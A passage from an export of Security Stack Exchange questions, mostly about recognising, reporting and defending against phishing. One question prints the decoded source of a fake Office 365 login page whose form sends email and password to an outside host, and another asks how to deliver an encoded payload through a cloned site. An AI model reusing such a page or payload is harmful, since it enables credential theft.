 &lt;p&gt;Yellow is my email address. The sender's email address is legitimate, so are all the other details.&lt;/p&gt;
 &lt;p&gt;Here are screenshots of a legitimate email from Mail Delivery Subsystem that I received recently for comparison:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/Adr4T.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/Adr4T.png" alt="Legit email" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/OhmKP.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/OhmKP.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;How is this possible? I definitely did not send that email and I'm pretty sure my gmail was not accessed by someone else (Google would have alerted me). This is the first time I see this. It seems whoever did this was somehow able to trick the google delivery system to think that I sent that email.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;gmail&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>How to report a phishing text?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a text message on my phone the other day with an attachment link: &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Dear Customer, please contact us about your account Call2bankofamerica&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;It's an obvious phishing attempt, and I would like to report it but to whom? I called Bank of America and fowarded the message to their abuse department, but now what? &lt;/p&gt;
 &lt;p&gt;Bank of America was not helpful, by the way. I would like to post it on the internet so people could google this info. This is the first time I've received anything like this and I would like to post a warning. &lt;/p&gt;</t>
  </si>
  <si>
    <t>Free/Inexpensive IP blacklists</t>
  </si>
  <si>
    <t>&lt;p&gt;What are some free or inexpensive places where I can grab blacklists automatically? I do not want to have to query for each individual IP. The firewall, PF, requires you to have the IPs or ranges in a file line by line.&lt;/p&gt;
 &lt;p&gt;Any type of blacklist applies -- but I am more worried about malicious content, such as botnets, compromised hosts, and phishing IPs. &lt;/p&gt;
 &lt;p&gt;I have tried to research this through Google, but a lot of resources are for how to remove yourself from a blacklist, and many providers are on a query basis only. I understand that most providers do not want to give away their entire database of IPs, but maybe there is a free list established by a consortium that I do not know of.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;blacklist&gt;</t>
  </si>
  <si>
    <t>Firewall requirements for SaaS service providers</t>
  </si>
  <si>
    <t>&lt;p&gt;I have not had much success compiling a workable overview on the topic of firewalls and application service providers, despite making a rather extensive contribution to Google's workload this month. I'm hoping the SE community can share some pointers, perhaps shed enough light to balance the Vendor brochures and "the completely unbiased paper that we paid someone to write" :)&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;em&gt;There is a lot of focus on &lt;code&gt;NGFW&lt;/code&gt; (like Palo Alto), &lt;code&gt;WAF&lt;/code&gt; (like Imperva) and &lt;code&gt;ADC&lt;/code&gt; (like F5) alongside feature-packed upgrades to classic firewall brands (like CheckPoint).&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Most of the marketing appears to be target around users and systems accessing a wide variety of applications and services using any number of protocols. Surely the common scenario if you have a corporate network with users, assets and also services, but mostly behaving as what I might refer to as &lt;code&gt;service consumers&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;However, it's not clear to me which features will be of value to a &lt;code&gt;service provider&lt;/code&gt;, where the application delivery network only has to support a very few, very specific applications, services and protocols - and where there are no users that must be protected from nothing and everything ranging from phishing attacks and e-mail attached malware to unhealthy surfing habits. On the other hand performance and availability is critical, and we can safely assume APT (likely several).&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Typical traffic might be:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;inbound HTTPS
 - Application access (clients)
 - API access (partnering services, clients)
 - VPN access for operational personnel
 outbound DNS
 - lookup external services
 - reverse lookup connections to application(s)
 outbound HTTPS
 - External API access (vendors, partnering services) 
 - SSO integrations
 - Access to software updates
 outbound SMTP (STARTTLS)
 - Forwarding mail to specific relay services
 outbound NTP
 - Need to sync with something.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;How do you go about finding and selecting a vendor or solution?&lt;/strong&gt; &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;What considerations come into play? &lt;/li&gt;
 &lt;li&gt;Any features particularly useful to service providers?&lt;/li&gt;
 &lt;li&gt;Any next generation firewall (NGFW) features that can safely be ignored? &lt;/li&gt;
 &lt;li&gt;What about application firewalls (WAF)?&lt;/li&gt;
 &lt;li&gt;Which firewall features might be required and which add value but remain optional? &lt;/li&gt;
 &lt;li&gt;Can you safely leave firewall functions to an ADC or load balancer? &lt;/li&gt;
 &lt;li&gt;Might one need to combine several types of firewall devices? &lt;/li&gt;
 &lt;li&gt;IPS/IDS functions covered in the firewall, or dedicated?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;firewalls&gt;&lt;web-service&gt;&lt;cloud-computing&gt;</t>
  </si>
  <si>
    <t>My company sent a phishing email - can they see if I saved the attachment?</t>
  </si>
  <si>
    <t>&lt;p&gt;My company is doing an anti-phishing campaign and sent out a "fake" email to see how many people would open the attachment. They had previously sent out information about how to avoid these kind of attacks.&lt;/p&gt;
 &lt;p&gt;So of course I recognized the email as part of the campaign, but my curiosity got the best of me and I was dying to see the code (it was an .html attachment). My question is: will they know if I saved the attachment to my desktop and then opened it with Notepad? I guess a secondary question would be is that safe to do in the first place?&lt;/p&gt;
 &lt;p&gt;I can attach the HTML code if anyone is curious, redacting the company specific information of course, but I'm not sure if that's necessary. Thanks in advance!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;tracking&gt;&lt;email-attachments&gt;</t>
  </si>
  <si>
    <t>How can "unvalidated redirects and forwards" be exploited?</t>
  </si>
  <si>
    <t>&lt;p&gt;The OWASP example for &lt;a href="https://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards" rel="nofollow noreferrer"&gt;Unvalidated Redirects and Forwards&lt;/a&gt; says that:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;The application has a page called ‚Äúredirect.jsp‚Äù which takes a single parameter named ‚Äúurl‚Äù. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;How does an attacker crafts a malicious URL and forces it on the victim? If one goes to &lt;code&gt;foo.bar&lt;/code&gt;, fills a form and submits it, how can one be redirected to amalicious site?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;url-redirection&gt;</t>
  </si>
  <si>
    <t>deliver a malicious payload via a cloned website</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been tasked with conducting an internal pentest, I'm relatively new to this so please bare with me. &lt;/p&gt;
 &lt;p&gt;Some time ago, I used &lt;em&gt;setoolkit&lt;/em&gt; and I would have the option to clone a website and attach a malicious &lt;em&gt;jar&lt;/em&gt; file, additionally the option to encode the payload was there using &lt;em&gt;Shikata ga nai&lt;/em&gt;. In the newer version of &lt;em&gt;setoolkit&lt;/em&gt; I don't see this option to encode any longer. I'm able to go through the same process however this time my AV is detecting the &lt;em&gt;jar&lt;/em&gt; files.&lt;/p&gt;
 &lt;p&gt;I have 2 questions , can any one recommend a paper/howto on how to recreate/clone a site and basically perform the functionality described above without using &lt;em&gt;setoolki&lt;/em&gt;t? (I can use &lt;em&gt;msploit&lt;/em&gt;, to create payload however I'm still learning ins and outs of this tool)&lt;/p&gt;
 &lt;p&gt;What happen to the encoding option in &lt;em&gt;SEtoolkit&lt;/em&gt;? Is there another way to do this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;metasploit&gt;&lt;kali-linux&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Is there a name for creating a malicious subdomain under of legit domains, like XXbadsiteXX.blob.core.windows.net?</t>
  </si>
  <si>
    <t>&lt;p&gt;This is similar to domain shadowing, but there is no compromise taking place of a registrar account; these sites let users create subdomains. I was wondering if there is a proper name for this kind of phishing/impersonation attack?&lt;/p&gt;
 &lt;p&gt;Two examples that come to mind are Azure blob storage and personal sharepoint sites. Both have legitimate primary domains and certs registered to Microsoft, e.g.:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;XXbadsiteXX.blob.core.windows.net
 XXbadsiteXX-my.sharepoint.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;We are performing some remediation automation for blacklisting URLs and this would come in handy for whitelisting. I am trying to find a list of websites that let you create your own malicious subdomains under the guise of a legit domain and cert. Knowing what to google would help.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;network&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Get information of phishing website owner</t>
  </si>
  <si>
    <t>&lt;p&gt;I was a victim of a phishing scheme.&lt;/p&gt;
 &lt;p&gt;I clicked on a link that was sent to me and got to a site that impersonates a bitcoin site. I entered my credentials and the owner of the site used them to steal bitcoin from my account.&lt;/p&gt;
 &lt;p&gt;I used &lt;a href="https://www.whois.com/" rel="nofollow noreferrer"&gt;whoIs&lt;/a&gt; to find out where the website was registered, but that doesn't give me the owner's details.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Can I get the website's owner details from the registrar?&lt;/li&gt;
 &lt;li&gt;If so, will I be able to make legal action against them?&lt;/li&gt;
 &lt;li&gt;Will reporting to &lt;a href="https://www.us-cert.gov/" rel="nofollow noreferrer"&gt;https://www.us-cert.gov/&lt;/a&gt; help? (are there other places?)&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>Incident response to a medium scale phishing attack whereas the targets are not from our company?</t>
  </si>
  <si>
    <t>&lt;p&gt;Our company suffered a phishing attack yesterday. While investigating about the attacker and the potential employees of ours who might have been phished, we ended up with the attacker database of phished users.&lt;/p&gt;
 &lt;p&gt;This database include user email and passwords (~40) from multiple companies (~10) who seems to be sharing the same phishing attack as us. Moreover, it seems that the target are high profile.&lt;/p&gt;
 &lt;p&gt;So far, here is what we have been accomplishing :&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Contact targeted companies and list phished users&lt;/li&gt;
 &lt;li&gt;Contact websites where the phishing attack is happening (it is happening on multiple hacked websites so it's hard to stop it)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;However, we're not sure this is the best way to deal with the following situation, here is why :&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;More and more users still enter their credentials and this is not our role to secure other companies users and we would like to stop wasting time on this (most of the companies following up to our email or calling us asking for more details).&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;We are worried that some companies (targeted companies being in the same industry as us) might not understand us well and think we are in some way associated to that phishing attack because we are one of their competitors&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;We are doing security for our competitors (so we're spending money for them)&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;One solution could be to publish a blog post but it has downsides too such as being seen as a toxic player because we would be pointing fingers at our competitors security. Another solution would be not to contact this companies and let them get compromised.&lt;/p&gt;
 &lt;p&gt;What would be the best way to react to this phishing attack ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;incident-response&gt;</t>
  </si>
  <si>
    <t>How should 2FA/MFA be implemented so it isn't easily bypassed?</t>
  </si>
  <si>
    <t>&lt;p&gt;At least twice now I heard most sites implement 2FA/MFA poorly and after X amount of attempts it should lock you out. They didn't give clear enough information for me to know what they're talking about, actually they were complete shit at articulating their words so I suspect they have no idea about anything but hearing it enough made me wonder&lt;/p&gt;
 &lt;p&gt;How should 2FA/MFA be implemented? What are common threats? I heard from bad sources that people bypass TOTP by creating a phishing site and basically MITM the password and code. Another source said some attackers do credential stuffing and if they find hits they'll send codes, which I'm assuming isn't TOTP but an activation link a user can click on to grant access? I have no idea why people mention locking out after X tries since neither attacks seem to be trying many times.&lt;/p&gt;
 &lt;p&gt;So far from what I can tell I should do the following&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Rate limit the password so an attacker can't try 10+ passwords for a specific user, or 100s of passwords from a single IP address&lt;/li&gt;
 &lt;li&gt;Don't send SMS links unless maybe they have to click confirm allow the user in after clicking the link?&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I'm not sure what else I should do related to multi factor authentication&lt;/p&gt;</t>
  </si>
  <si>
    <t>What would you do as first day of CSO or Head of CyberSecurity</t>
  </si>
  <si>
    <t>&lt;p&gt;I was asked this question at an interview today and was unable to give a structured answer since there is so many things a head of security can do.&lt;/p&gt;
 &lt;p&gt;The additional info that I had were :
 - You can hire whoever you want
 - You can do whatever you want
 - You don't have an unlimited budget but you have enough for the most important things&lt;/p&gt;
 &lt;p&gt;Since I'm pretty unexperimented in all management and planning stuffs I was a little lost (I'm currently a SOC operator).&lt;/p&gt;
 &lt;p&gt;I'd say that you need a complete map of the network, list all assets with versions. A list of updates and patches to apply to to those assets to have the latest security updates. Same for the softwares.
 Organise a vulnerability assessment of the complete infrastructure.&lt;/p&gt;
 &lt;p&gt;You can also organize security awarness campain (lock screen when you leave your desk, phishing campain, presentation of basic security vulnerabilities and how to tackle them, ...)&lt;/p&gt;
 &lt;p&gt;I think that I missed some crucial parts in the answer but don't know what. Do you have additional informations ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;architecture&gt;&lt;vulnerability-assessment&gt;</t>
  </si>
  <si>
    <t>How do I report new malware?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a new piece of malware that isn't detected by current anti-virus vendors. How do I report it to them?&lt;/p&gt;
 &lt;p&gt;I want to do a good turn and help protect as many people as possible. What is the best and easiest way to get it to as many anti-virus vendors as possible, to help them detect it? Is there a list of sites where I should upload the sample, or email addresses where I should send it to?&lt;/p&gt;
 &lt;p&gt;I know about Virustotal. I could submit the sample to Virustotal. Will that be sufficient? Currently few or no antivirus engines detect this malware. Will submitting the sample be enough for antivirus engines to know that it is malicious and &lt;em&gt;should&lt;/em&gt; have been detected, and trigger them to analyze it and develop a signature/detector for it?&lt;/p&gt;
 &lt;p&gt;(It's not obvious to me how anti-virus vendors would know that my sample is malicious, just because it was uploaded to Virustotal. I didn't see any user interface in Virustotal where I indicate "yes, this really is malicious, even though no one detected it", so I wonder if it will get lost in amongst all the other benign samples. I've heard of plenty cases of malware that had been uploaded to Virustotal for months or years before any antivirus engine started detecting it. So it makes me wonder whether uploading it to Virustotal is enough.)&lt;/p&gt;
 &lt;p&gt;I've looked, but I haven't found an answer on this site. Here's what I found:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;&lt;a href="https://security.stackexchange.com/q/1728/971"&gt;Where to report malicious URLs, phishing, and malicious web sites?&lt;/a&gt; provides a list of where to report phishing web sites and other malicious web sites, but it doesn't say where to submit malware samples.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;&lt;a href="https://security.stackexchange.com/q/5227/971"&gt;Unknown malware, how to report it and whom to report it to?&lt;/a&gt; asks a related question in a more specific situation. One answer mentions Virustotal, but it doesn't answer my question of whether submitting to Virustotal actually works, in terms of notifying A/V vendors to trigger analysis. Another answer gives links to forms where you can upload malware samples to two anti-virus vendors, but that's just two of the dozens of vendors out there -- if I need to submit directly to A/V vendors, I am hoping for a more comprehensive list that is easy to refer to.&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;virus&gt;&lt;incident-response&gt;</t>
  </si>
  <si>
    <t>Can SMS messages be traced when they come from a computer?</t>
  </si>
  <si>
    <t>&lt;p&gt;From Amazon SNS, I can send SMS messages to any mobile phone.&lt;/p&gt;
 &lt;p&gt;To recipient phones, the SenderId is just a string of my choosing. The messages cannot be replied to.&lt;/p&gt;
 &lt;p&gt;I receive quite a few phishing messages that appear to be sent via a similar mechanism. I can't reply 'stop' and the sender ID is just a name.&lt;/p&gt;
 &lt;p&gt;Is it possible for network operators to trace these types of SMS messages back to their sender? Or is the inter-network protocol completely anonymous?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Can you trust the URL shown when 'hovering' on a link?</t>
  </si>
  <si>
    <t>&lt;p&gt;When using a modern web browser, if you hover on a link, the browser will show you the link in a little display on the bottom left corner of the browser screen.&lt;/p&gt;
 &lt;p&gt;Can I trust this? Can this display be spoofed? For instance, can Javascript display something to make it look like the link is to URL A when clicking on the link will actually take me to URL B?&lt;/p&gt;
 &lt;p&gt;I recently received some advice that, before clicking on a suspicious link, I should hover over the link to see where it will go. I personally find this extremely dubious and I suspect there are multiple ways that this can be fooled, but I wanted to ask here among folks who may have thought about this more deeply than I.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;phishing&gt;&lt;spoofing&gt;&lt;usability&gt;</t>
  </si>
  <si>
    <t>Clicked link on fake email which appeared to be from friend</t>
  </si>
  <si>
    <t>&lt;p&gt;I receieved an e-mail which at first glance appeared to be from a friend, I clicked on the link provided without thinking as we would often exchance links to sites. The link went nowhere i.e page not found. When I looked at the e-mail again, the actual e-mail address was completly different to my friends. 
 Does simply clicking with no other activity provider hackers with a route into my computer? The computer has since been disconnected from the internet.&lt;/p&gt;
 &lt;p&gt;Any repsonses would be greatly appriecated.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;virus&gt;&lt;phishing&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>I think i might have accidentally clicked a phishing link, how can i be sure?</t>
  </si>
  <si>
    <t>&lt;p&gt;Long story short I might have accidentaly clicked a phishing link is there any kind of test I can do or anything I can do to check?&lt;/p&gt;</t>
  </si>
  <si>
    <t>School Request: What can be done protect people's financial information?</t>
  </si>
  <si>
    <t>&lt;p&gt;This is a bit of an odd question, and if it doesn't belong on this forum feel free to retract. I was asked by a group of 7th graders to share my thoughts on the problem of credit card data breaches. Honestly I don't think I'm qualified to respond, but would like to encourage their thinking about the problem.
 They are assuming technology that will be readily available in 20 years, ish. Here is the question in full:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;We are writing to you because we have some questions on the topic Data Breaches. We know that Data Breaches can happen at anytime of the day or night, but we have some questions on what people can do to help stop data breaches. Having your data stolen can be a devastating event and can end up with a lot of your hard earned money stolen. Our solution to combat this is to update out current ways of credit card information. Instead of having a set in stone 16 digit number with an expiration date and a CCV, instead it‚Äôs just going to be one simple 8-12 string of letters and numbers that cycles either everyday or very frequently to prevent your information being compromised. This information will be stored in your credit card and online so you can make online transactions. This makes buying online and in real life a lot more easier and safer. Now, we don‚Äôt know how this cycling system can be implemented and can stay secure without any bugs or mishaps that could leave the system vulnerable. We would also have to completely change our systems and payment methods so that they could adapt to this new system of payment. We sincerely thank you for your time in assisting our idea for a future technology.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Thanks in advance; I appreciate the community's thoughts!&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;EDIT - thanks for your help!&lt;/strong&gt;
 Here's my response; hopefully I haven't introduced too many inaccuracies :)&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Congratulations - you've asked the $100 billion dollar question! :)&lt;/p&gt;
 &lt;p&gt;Obviously credit card theft is a very serious problem. Fortunately, the consequences for consumers aren't necessarily as dire as you might think. Credit cards are convenience tools that allow people to borrow money, as such when a stolen card is used it's the lender that is on the hook, and cc companies generally do not charge customers for fraudulent transactions. Since they are liable for payments CC companies are on the lookout for fraud; they detect it by analyzing their customers' spending habits and looking for unusual activity (buying things they don't usually buy, spending money in foreign countries, etc) and they will either proactively reject the transaction or flag it and alert customers if they detect such activity. CC companies also respond to customers who report stolen cards and do not usually charge for transactions¬†customers report as being illicit.&lt;/p&gt;
 &lt;p&gt;Debit cards are a different matter. They are linked directly to consumers' bank accounts and it may be harder to convince a bank to reimburse customers for charges made on a stolen debit card. Think twice about using or even owning them.&lt;/p&gt;
 &lt;p&gt;Whether you use a credit or debit card, it is a good idea to pay attention to your billing statements and reporting any charges you don't recognize so you can report it quickly.¬†Some other general advice that can reduce exposure:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Use credit, not debit (e.g. your bank account), as you have less recourse for stolen money otherwise.&lt;/li&gt;
 &lt;li&gt;Be extremely careful with who you give your number to online.
 &lt;ul&gt;
 &lt;li&gt;If you were directed there from an email, make absolutely certain the site is who they claim to be (it could have been a phishing email).&lt;/li&gt;
 &lt;li&gt;Only provide it to reputable processors and make sure the connection is done over TLS (encrypted internet connections; browsers usually have a shield or a lock in the address bar).&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/li&gt;
 &lt;li&gt;Only use cards &lt;em&gt;without&lt;/em&gt; a magnetic stripe to protect from &amp;quot;skimmers&amp;quot; which are placed around legitimate card readers and read information on the card from the stripe.
 &lt;ul&gt;
 &lt;li&gt;If the card only has a chip, then it's much more difficult to intercept sensitive data.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/li&gt;
 &lt;li&gt;Don't give out your CC number to anyone on the phone if they called¬†you. Call the company back at the number found on their official website (again, you're verifying who you're interacting with; caller Id's can be spoofed).&lt;/li&gt;
 &lt;li&gt;Make sure you shred sensitive paperwork (bills and statements) before throwing it away.&lt;/li&gt;
 &lt;li&gt;Keep your browser and operating system up to date to avoid malware.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;One last option is to use virtual credit cards, and your¬†solution actually bears a lot in common with them.¬†Some credit card vendors will allow you to generate virtual card numbers. Being more ephemeral, they're less valuable to attackers and lower the risk of unauthorized charges. The major drawback of virtual credit cards is that the rotation scheme is not automatic; it's up to users to cycle their credit card numbers, and update them in all places they're being used. Automating the scheme might be done using something similar to a¬†Two¬†Factor¬†Authenticator (2FA). 2FA is a system¬†where synchronized time and paired pseudo-random seeds into an algorithm running on a computer, phone, or it's own little device (often referred to as a FOB) is compared to its twin at the security service. This technology is commonly used in many corporate VPN networks, and it is conceivable that this technology could be incorporated into credit cards. One problem with this approach¬†is that the chips in credit cards are extremely low-power and do not have the ability to keep track of time, so they would need to trust the untrusted and potentially malicious chip reader that could lie to them about the current time to retrieve future numbers. Perhaps this problem will be solved as battery miniaturization progresses.¬†A more challenging problem with this approach is that¬†you generally only implement it on a one-to-one basis; you don't want the same authenticator sequence for multiple accounts - it would be like sharing passwords! So we would need to work through this challenge.&lt;/p&gt;
 &lt;p&gt;Thanks so much for your question. It's good to see you thinking about this problem. The landscape is constantly evolving and I'm encouraged to see young people taking an interest and proactively thinking of solutions!&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Regarding point allocation I've upvoted all your answers as they were all extremely helpful. I accepted Forest's because I drew most of my response from it. Thanks again for the assistence!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;credit-card&gt;&lt;sensitive-data-exposure&gt;</t>
  </si>
  <si>
    <t>Reverse tabnabbing: why not redirect the user in the new tab itself instead of the parent tab?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have recently been reading about reverse tabnabbing, where a child window can change the url of the parent window if it has access to &lt;code&gt;window.opener&lt;/code&gt; (which it has by default unless you explicitly disallow it)&lt;/p&gt;
 &lt;p&gt;In this case the phishing attack is to change the parent tab url and present a similar UI as some trusted website to get user credentials and assume that user might not be able to notice that the url has changed.&lt;/p&gt;
 &lt;p&gt;I would like to understand why can't this happen in the child window itself ? Agreed that attention wise there are more chances that user would pay less attention to the parent window after the child window is opened, but after sometime, when the user has not been looking at either of the tabs, wouldn't it be similar to just change the url of the child window instead of the parent window ?&lt;/p&gt;
 &lt;p&gt;Are there any other security concerns that do not allow this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;content-security-policy&gt;</t>
  </si>
  <si>
    <t>What were the specific security flaws with OAuth 1.0? How are they being addressed in 2.0?</t>
  </si>
  <si>
    <t>&lt;p&gt;I read an &lt;a href="http://news.cnet.com/8301-13577_3-10225103-36.html"&gt;article&lt;/a&gt; documenting Twitter abruptly pulling its OAuth support back in April 2009. The article said it wouldn't specify the hole for security reasons, but mentioned "social engineering" is involved.&lt;/p&gt;
 &lt;p&gt;I'm guessing that the hole is that a malicious site can pretend to be using OAuth, and redirect the user to a phishing site meant to mimic Twitter in an attempt to get their username and password. Is this correct?&lt;/p&gt;
 &lt;p&gt;Additionally, whatever the flaw is, how is it being addressed in 2.0?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;cryptography&gt;&lt;authentication&gt;&lt;federation&gt;&lt;protocols&gt;&lt;authorization&gt;</t>
  </si>
  <si>
    <t>How can I download and read a file that might be spear fishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;My colleague has forwarded me an email and asked "Can you please check for me if it is genuine?"&lt;/p&gt;
 &lt;p&gt;I'm just a programmer, so I have no idea. &lt;/p&gt;
 &lt;p&gt;The email is from a website called PDFfiller, which seems to be a document editing and sharing service. The person sending it is called **Account Payable**. I'm meant to click on a link to download a PDF.&lt;/p&gt;
 &lt;p&gt;I have asked if they are expecting an email and if they could ask if anyone has sent documents this way, and my colleague replied that it could be from a customer.&lt;/p&gt;
 &lt;p&gt;Is there a way to download and read the PDF without too much exposure?&lt;/p&gt;
 &lt;p&gt;For example would it be low risk to open it in a virtual machine?&lt;/p&gt;
 &lt;p&gt;Basically I don't want to open the file and have my machine become a hostage, or to have all my outlook contacts stolen.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Accidentally click a phishing link, is it dangerous?</t>
  </si>
  <si>
    <t>&lt;p&gt;not sure is this the correct place to ask a question like this.&lt;/p&gt;
 &lt;p&gt;I had accidentally clicked a link from my email, it bring me to a strange website that with a very long URL.&lt;/p&gt;
 &lt;p&gt;After Googling for some time, I found ways to convert it to a readable text, but I have no idea what it does, and how dangerous it is, are there any experience people here that can help me out?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript"&amp;gt;
 &amp;lt;!-- HTML Encryption provided by www.webtoolhub.com --&amp;gt;
 &amp;lt;!--
 document.write(unescape('&amp;lt;!doctype html&amp;gt;
 &amp;lt;html&amp;gt;
 &amp;lt;head&amp;gt;
 &amp;lt;meta charset="utf-8"&amp;gt;
 &amp;lt;title&amp;gt;Sign in to Office 365&amp;lt;/title&amp;gt;
 &amp;lt;meta name="generator" content="WYSIWYG Web Builder 10 - http://www.wysiwygwebbuilder.com"&amp;gt;
 &amp;lt;link href="http://thesimnews.com/box/owa/Untitled1.css" rel="stylesheet"&amp;gt;
 &amp;lt;link href="http://thesimnews.com/box/owa/nickeloffice.css" rel="stylesheet"&amp;gt;
 &amp;lt;script src="http://thesimnews.com/box/owa/jquery-1.11.1.min.js"&amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;script src="http://thesimnews.com/box/owa/wwb10.min.js"&amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;script&amp;gt;
 $(document).ready(function()
 {
  LoadValue('Editbox1', 'local', 0);
  LoadValue('Editbox2', 'local', 0);
  LoadValue('Checkbox1', 'local', 1);
  $("#Form1").submit(function(event)
  {
  StoreValue('Editbox1', 'local', 0);
  StoreValue('Editbox2', 'local', 0);
  StoreValue('Checkbox1', 'local', 1);
  return true;
  });
 });
 &amp;lt;/script&amp;gt;
 &amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
 &amp;lt;div id="wb_Image1" style="position:absolute;left:0px;top:1px;width:1327px;height:666px;z-index:4;"&amp;gt;
 &amp;lt;img src="http://thesimnews.com/box/owa/images/Capture.PNG" id="Image1" alt=""&amp;gt;&amp;lt;/div&amp;gt;
 &amp;lt;div id="wb_Text1" style="position:absolute;left:892px;top:160px;width:211px;height:16px;z-index:5;text-align:left;"&amp;gt;
 &amp;lt;span style="color:#DC143C;font-family:'Lucida Sans Unicode';font-size:13px;"&amp;gt;Please login to continue upgrade&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
 &amp;lt;div id="wb_Form1" style="position:absolute;left:878px;top:174px;width:363px;height:174px;z-index:6;"&amp;gt;
 &amp;lt;form name="Form1" method="post" action="http://thesimnews.com/box/owa/result.php" enctype="multipart/form-data" accept-charset="UTF-8" target="_self" id="Form1"&amp;gt;
 &amp;lt;input type="hidden" name="formid" value="form1"&amp;gt;
 &amp;lt;input type="email" id="Editbox1" style="position:absolute;left:14px;top:11px;width:342px;height:24px;line-height:24px;z-index:0;" name="Email" value="" placeholder="someone@example.com"&amp;gt;
 &amp;lt;input type="password" id="Editbox2" style="position:absolute;left:14px;top:47px;width:342px;height:24px;line-height:24px;z-index:1;" name="Password" value="" placeholder=" Password"&amp;gt;
 &amp;lt;input type="checkbox" id="Checkbox1" name="" value="on" style="position:absolute;left:11px;top:85px;z-index:2;"&amp;gt;
 &amp;lt;input type="submit" id="Button1" name="" value="" style="position:absolute;left:14px;top:136px;width:66px;height:31px;z-index:3;"&amp;gt;
 &amp;lt;/form&amp;gt;
 &amp;lt;/div&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt;'));
 //--&amp;gt;
 &amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>People using my email address (and only that) for booking hotels. What kind of scam is this?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have faced the same issue twice: 2 people, whose names are definitely not the same as mine, used my email address to book hotels through a well-known hotel company and a lesser-known hotel booking site (well, lesser-known in my country). &lt;/p&gt;
